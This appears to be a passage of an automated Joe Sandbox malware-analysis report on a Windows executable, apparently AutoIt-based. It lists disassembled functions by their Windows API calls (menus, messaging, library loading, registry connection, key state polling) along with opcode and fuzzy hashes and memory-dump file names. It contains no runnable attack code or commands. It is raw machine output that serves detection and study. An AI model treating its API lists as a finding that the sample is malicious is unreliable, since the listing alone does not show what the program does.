                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                • ExitThread.KERNEL32 ref: 004151ED
                                                                                                • __freefls@4.LIBCMT ref: 00415209
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                • String ID:
                                                                                                • API String ID: 442100245-0
                                                                                                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                • _wcslen.LIBCMT ref: 0045F94A
                                                                                                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                • String ID: 0
                                                                                                • API String ID: 621800784-4108050209
                                                                                                • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                • String ID: \VH
                                                                                                • API String ID: 3884216118-234962358
                                                                                                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                Function 00434B02 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                • String ID: AU3_GetPluginDetails$#v
                                                                                                • API String ID: 145871493-3662034293
                                                                                                • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                • IsMenu.USER32(?), ref: 0044854D
                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                • DrawMenuBar.USER32 ref: 004485AF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                • String ID: 0
                                                                                                • API String ID: 3076010158-4108050209
                                                                                                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$_memmove_wcslen
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 1589278365-1403004172
                                                                                                • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Handle
                                                                                                • String ID: nul
                                                                                                • API String ID: 2519475695-2873401336
                                                                                                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Handle
                                                                                                • String ID: nul
                                                                                                • API String ID: 2519475695-2873401336
                                                                                                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: SysAnimate32
                                                                                                • API String ID: 0-1011021900
                                                                                                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                • GetFocus.USER32 ref: 0046157B
                                                                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                • __swprintf.LIBCMT ref: 00461608
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                • String ID: %s%d
                                                                                                • API String ID: 2645982514-1110647743
                                                                                                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                • String ID:
                                                                                                • API String ID: 3488606520-0
                                                                                                • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConnectRegistry_memmove_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 15295421-0
                                                                                                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                Memory Dump Source
